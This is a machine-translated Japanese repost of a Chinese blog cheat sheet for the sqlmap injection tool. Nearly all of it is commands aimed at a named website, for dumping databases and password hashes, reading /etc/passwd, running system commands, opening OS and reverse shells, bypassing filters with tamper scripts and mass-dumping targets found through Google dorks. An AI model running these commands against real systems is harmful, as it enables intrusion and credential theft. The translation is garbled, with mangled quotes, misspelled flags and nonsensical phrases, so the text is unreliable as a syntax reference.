侵入テストの一般的なツール-sqlmap

基本的な使い方

sqlmap -u "url"

図に示すように、いくつかのシステム情報をスキャンします。
ここに画像の説明を挿入

sqlmp -u "url" --current-user

現在のユーザー名を分解する

ここに画像の説明を挿入

sqlmap -u "url" --currnet-db

現在のデータベース
ここに画像の説明を挿入

sqlmap -u "url" --tables -D "db_name"

このライブラリに基づいてテーブル名を推測します

ここに画像の説明を挿入

sqlmap -u "url" --columns -T "tables_name" users -D "db_name" -v 0

ライブラリによると、テーブルはフィールドを推測します。

ここに画像の説明を挿入

sqlmap -u "url" --dump -C "columns_name" -T "tables_name" -D "db_name" -v 0

記録を確認する

ここに画像の説明を挿入

情報取得

他のデータベースを一覧表示する

sqlmap -u "url" dbs

ここに画像の説明を挿入

データベースユーザーロールの列挙

sqlmap -u "url" -roles

ここに画像の説明を挿入

sqlmap -u "url" --dump-all

ズボンを脱ぐ

ディレクトリはルートディレクトリの下にあります。/sqlmap
ここに画像の説明を挿入

PS

SQLMAPの使用記録

*** 基本的な手順

sqlmap -u "http://doscn.org/news?id=1" --current-user#現在のユーザー名を
取得sqlmap -u "http://doscn.org/news?id=1" --current- db
現在のデータベース名を取得sqlmap -u "http://doscn.org/news?id=1" --tables -D "db_name"
#リストsqlmap -u "http://doscn.org/news?id = 1” --columns -T“ tablename” users-D“ db_name” -v 0
#Column field sqlmap -u“ http://doscn.org/news?id=1” --dump -C“ column_name”- T“ table_name” -D
“ db_name” -v 0 フィールドのコンテンツ
情報を取得し、 sqlmap を取得します-u“ http://doscn.org/news?id=1” --smart --level 3 --users#smart smart level実行テストレベル
sqlmap -u "http://doscn.org/news?id=1" --dbms "Mysql" --users#
dbms データベースタイプを指定するsqlmap -u "http://doscn.org/news?id = 1 "--users #Column database user
sqlmap -u" http://doscn.org/news?id=1 "--dbs#列データベース
sqlmap -u "http://doscn.org/news?id=1" --passwords#
データベースユーザーパスワードsqlmap -u "http://doscn.org/news?id=1" --passwords-U root- v 0
指定したユーザーデータベースのパスワードを一覧表示しますsqlmap -u "http://doscn.org/news?id=1" --dump -C "password、user、id" -T "tablename" -D "db_name"- -start 1 --stop 20
指定されたフィールドのリスト、20のリストsqlmap -u "http://doscn.org/news?id=1" --dump-all -v 0#すべてのデータベースのすべてのテーブルをリスト
sqlmap -u "http://doscn.org/news?id=1" --privileges #View権限
sqlmap -u "http://doscn.org/news?id=1" --privileges -U root #Viewユーザー権限を指定します
sqlmap -u "http://doscn.org/news?id=1" --is-dba -v 1
データベース管理者ですかsqlmap -u "http://doscn.org/news?id = 1 "--roles #Enumerate database user roles
sqlmap -u" http://doscn.org/news?id=1 "--udf-inject #Import user-defined functions(acquire system permissions!)
sqlmap -u "http://doscn.org/news?id=1" --dump-all --exclude-sysdbs -v 0
現在のライブラリのすべてのテーブルを一覧表示するsqlmap -u "http://doscn.org/ news?id = 1 "--union-cols #union query table record
sqlmap -u" http://doscn.org/news?id=1 "--cookie" COOKIE_VALUE "#cookieインジェクション
sqlmap -u" http:/ /doscn.org/news?id=1” -b#バナー情報を取得
sqlmap -u“ http://doscn.org/news?id=1” --data“ id = 3” #post inject
sqlmap -u“ http://doscn.org/news?id=1” -v 1 -f
#指紋識別データベースタイプsqlmap -u“ http://doscn.org/news?id=1” --proxy” http:// 127.0.0.1:8118 "
#プロキシインジェクションsqlmap -u“ http://doscn.org/news?id=1"–string"STRING_ON_TRUE_PAGE"#キーワード
sqlmap -u“を指定http://doscn.org/news? id = 1 "--sql-shell#指定されたsqlコマンドを
実行しますsqlmap -u" http://doscn.org/news?id=1 "--file / etc / passwd
sqlmap -u "http://doscn.org/news?id=1" --os-cmd = whoami#システムコマンドを実行する

sqlmap -u "http://doscn.org/news?id=1" --os-shell
#system interactive shell sqlmap -u "http://doscn.org/news?id=1" --os-pwn
#Bounce shell sqlmap -u "http://doscn.org/news?id=1" --reg-read #read winシステムレジストリ
sqlmap -u "http://doscn.org/news?id=1 "--Dbs-o" sqlmap.log "#Save progress
sqlmap -u" http://doscn.org/news?id=1 "--dbs -o" sqlmap.log "--resume #Restore saved progress
sqlmap -u "http://doscn.org/news?id=1" --msf-path = / opt / metasploit3 / msf2 --os-pwnバウンスシェルには
メタスプロイトパスが必要です
sqlmap -u "http:// doscn。 org / news?id = 1 "--tamper" base64encode.py "ロードスクリプト(インジェクション制限を回避するために使用可能)
sqlmap -g" google構文 "--dump-all --batch #google searchインジェクションポイントがすべて自動的に不足するフィールド
攻撃の例:
sqlmap -u "http://doscn.org/news?id=1&Submit=Submit" --cookie = "PHPSESSID = 41aa833e6d0d
28f489ff1ab5a7531406” --string =“姓” --dbms = mysql --users --password

公開された70元の記事 ウォン称賛17 ビュー6689

おすすめ

転載: blog.csdn.net/qq_38626043/article/details/104754788